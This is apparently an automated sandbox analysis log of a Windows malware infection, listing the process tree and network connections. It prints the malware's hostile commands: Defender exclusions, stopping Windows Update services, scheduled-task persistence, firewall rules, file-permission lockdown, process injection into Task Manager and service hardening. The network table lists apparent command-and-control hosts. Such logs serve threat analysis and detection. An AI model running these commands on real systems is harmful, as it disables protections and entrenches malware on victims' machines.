C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x16c,0x170,0x174,0x148,0x178,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x144,0x174,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2236 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2200,15131534077821605390,11980417360445905116,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2964 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2200,15131534077821605390,11980417360445905116,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2212 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3396 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4788 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5740 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5724 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4736 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\FB38.exe

C:\Users\Admin\AppData\Local\Temp\FB38.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ZI4xM2Zd.exe

C:\Users\Admin\AppData\Local\Temp\FCB0.exe

C:\Users\Admin\AppData\Local\Temp\FCB0.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\pG3rS0fl.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\Hf8Mh2Uh.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\Lq5hq4TW.exe

C:\Users\Admin\AppData\Local\Temp\FDEA.bat

"C:\Users\Admin\AppData\Local\Temp\FDEA.bat"

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1WK02es6.exe

C:\Windows\system32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\FEE2.tmp\FEE3.tmp\FEE4.bat C:\Users\Admin\AppData\Local\Temp\FDEA.bat"

C:\Users\Admin\AppData\Local\Temp\185.exe

C:\Users\Admin\AppData\Local\Temp\185.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5948 -ip 5948

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 184

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4656 -ip 4656

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 5284 -ip 5284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4656 -s 572

C:\Users\Admin\AppData\Local\Temp\4A3.exe

C:\Users\Admin\AppData\Local\Temp\4A3.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5284 -s 540

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 5136 -ip 5136

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5136 -s 412

C:\Users\Admin\AppData\Local\Temp\8F9.exe

C:\Users\Admin\AppData\Local\Temp\8F9.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2NB190Af.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

"C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "explothe.exe" /P "Admin:R" /E

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" echo Y"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:N"

C:\Windows\SysWOW64\cacls.exe

CACLS "..\fefffe8cea" /P "Admin:R" /E

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xc0,0x108,0x7ffe24f446f8,0x7ffe24f44708,0x7ffe24f44718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4620 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2172,14622987555952945728,10516962502020521330,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3612 /prefetch:1

C:\Users\Admin\AppData\Local\Temp\3D0A.exe

C:\Users\Admin\AppData\Local\Temp\3D0A.exe

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Users\Admin\AppData\Local\Temp\source1.exe

"C:\Users\Admin\AppData\Local\Temp\source1.exe"

C:\Users\Admin\AppData\Local\Temp\latestX.exe

"C:\Users\Admin\AppData\Local\Temp\latestX.exe"

C:\Users\Admin\AppData\Local\Temp\toolspub2.exe

"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Users\Admin\AppData\Local\Temp\5E3F.exe

C:\Users\Admin\AppData\Local\Temp\5E3F.exe

C:\Users\Admin\AppData\Local\Temp\60C1.exe

C:\Users\Admin\AppData\Local\Temp\60C1.exe

C:\Users\Admin\AppData\Local\Temp\6381.exe

C:\Users\Admin\AppData\Local\Temp\6381.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe

"C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\SYSTEM32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -nologo -noprofile

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\SysWOW64\rundll32.exe

"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main

C:\Windows\SYSTEM32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#nvjdnn#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

Network

Country Destination Domain Proto
US 8.8.8.8:53 17.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 59.128.231.4.in-addr.arpa udp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 83.121.18.2.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 195.233.44.23.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 www.facebook.com udp
NL 157.240.201.35:443 www.facebook.com tcp
US 8.8.8.8:53 accounts.google.com udp
NL 142.250.179.141:443 accounts.google.com tcp
NL 142.250.179.141:443 accounts.google.com udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
US 8.8.8.8:53 35.201.240.157.in-addr.arpa udp
US 8.8.8.8:53 141.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 195.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 131.179.250.142.in-addr.arpa udp
US 8.8.8.8:53 play.google.com udp
US 8.8.8.8:53 196.168.217.172.in-addr.arpa udp
NL 142.251.36.14:443 play.google.com tcp
NL 142.251.36.14:443 play.google.com udp
US 8.8.8.8:53 14.36.251.142.in-addr.arpa udp
N/A 224.0.0.251:5353 udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 static.xx.fbcdn.net udp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
CZ 157.240.30.27:443 static.xx.fbcdn.net tcp
US 8.8.8.8:53 facebook.com udp
US 8.8.8.8:53 27.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 208.194.73.20.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
US 8.8.8.8:53 29.68.91.77.in-addr.arpa udp
RU 5.42.92.211:80 5.42.92.211 tcp
US 8.8.8.8:53 211.92.42.5.in-addr.arpa udp
RU 5.42.65.80:80 5.42.65.80 tcp
FI 77.91.124.55:19071 tcp
US 8.8.8.8:53 80.65.42.5.in-addr.arpa udp
FI 77.91.124.55:19071 tcp
FI 77.91.124.55:19071 tcp
FI 77.91.124.1:80 77.91.124.1 tcp
US 8.8.8.8:53 1.124.91.77.in-addr.arpa udp
US 8.8.8.8:53 facebook.com udp
CZ 157.240.30.35:443 facebook.com tcp
US 8.8.8.8:53 fbcdn.net udp
CZ 157.240.30.35:443 fbcdn.net tcp
US 8.8.8.8:53 fbsbx.com udp
US 8.8.8.8:53 35.30.240.157.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
FI 77.91.68.29:80 77.91.68.29 tcp
TR 185.216.70.222:80 185.216.70.222 tcp
US 8.8.8.8:53 222.70.216.185.in-addr.arpa udp
FI 77.91.68.29:80 77.91.68.29 tcp
MD 176.123.9.142:37637 tcp
US 8.8.8.8:53 142.9.123.176.in-addr.arpa udp
NL 85.209.176.171:80 85.209.176.171 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.68.143:443 pastebin.com tcp
US 8.8.8.8:53 tak.soydet.top udp
US 8.8.8.8:53 171.176.209.85.in-addr.arpa udp
US 8.8.8.8:53 143.68.20.104.in-addr.arpa udp
FI 95.217.246.182:8443 tak.soydet.top tcp
US 8.8.8.8:53 bytecloudasa.website udp
US 172.67.212.39:80 bytecloudasa.website tcp
US 172.67.212.39:80 bytecloudasa.website tcp
US 8.8.8.8:53 182.246.217.95.in-addr.arpa udp
US 8.8.8.8:53 39.212.67.172.in-addr.arpa udp
